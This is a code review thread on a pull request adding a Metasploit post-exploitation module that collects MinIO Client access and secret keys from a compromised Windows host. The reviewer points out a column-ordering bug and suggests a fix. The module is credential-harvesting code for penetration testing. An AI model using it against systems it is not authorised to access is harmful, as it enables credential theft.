modules/post/windows/gather/credentials/minio_client.rb

```diff
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# @blurbdust based this code off of https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+# and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/enum_ms_product_keys.rb
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather MinIO Client Key',
+        'Description' => %q{
+          This is a module that searches for MinIO Client credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855' ]
+        ],
+        'Author' => ['Kali-Team <kali-team[at]qq.com>'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => %w[meterpreter powershell shell],
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[]
+          }
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('CONFIG_PATH', [ false, 'Specifies the config file path for MinIO Client']),
+      ]
+    )
+  end
+
+  def parser_minio(config_path)
+    print_status("Parsing file #{config_path}")
+    some_result = Hash.new
+    if file?(config_path)
+      file_contents = read_file(config_path)
+      if file_contents.nil? || file_contents.empty?
+        print_warning('Configuration file content is empty')
+        return some_result
+      end
+      begin
+        configuration = JSON.parse(file_contents)
+        if !configuration['aliases'].nil?
+          some_result = configuration['aliases']
+        end
+      rescue JSON::ParserError => e
+        elog('Unable to parse configuration', error: e)
+      end
+    end
+    return some_result
+  end
+
+  def print_and_save(all_result)
+    columns = [
+      'name',
+      'url',
+      'accessKey',
+      'secretKey',
+      'api',
+      'path',
+    ]
+    tbl = Rex::Text::Table.new(
+      'Header' => 'MinIO Client Key',
+      'Columns' => columns
+    )
+    all_result.each do |results|
+      results.each do |name, item|
+        row = [name] + item.values
+        tbl << row
+      end
```

Comment:
If I understand it correctly, in order to match the table headers, this relies on the fact that each alias has its elements always written in the same order. For example:
```
		"myminio": {
			"url": "https://play.min.io",
			"accessKey": "minioadmin",
			"secretKey": "minioadmin",
			"api": "s3v4",
			"path": "auto"
		},
```

If the order is different and still a valid JSON, this won't work. For example:
```
		"myminio": {
			"path": "auto",
			"url": "https://play.min.io",
			"accessKey": "minioadmin",
			"secretKey": "minioadmin",
			"api": "s3v4"
		},
```
This will output:
```
name     url                             accessKey             secretKey                                 api         path
----     ---                             ---------             ---------                                 ---         ----
...
myminio  auto                            https://play.min.io   minioadmin                                minioadmin  s3v4
...
```

Maybe each key should be stored individually to make sure it is the right one?

```suggestion
      results.each do |name, item|
        row = [name, item['url'], item['accessKey'], item['secretKey'], item['api'], item['path']]
        tbl << row
      end
```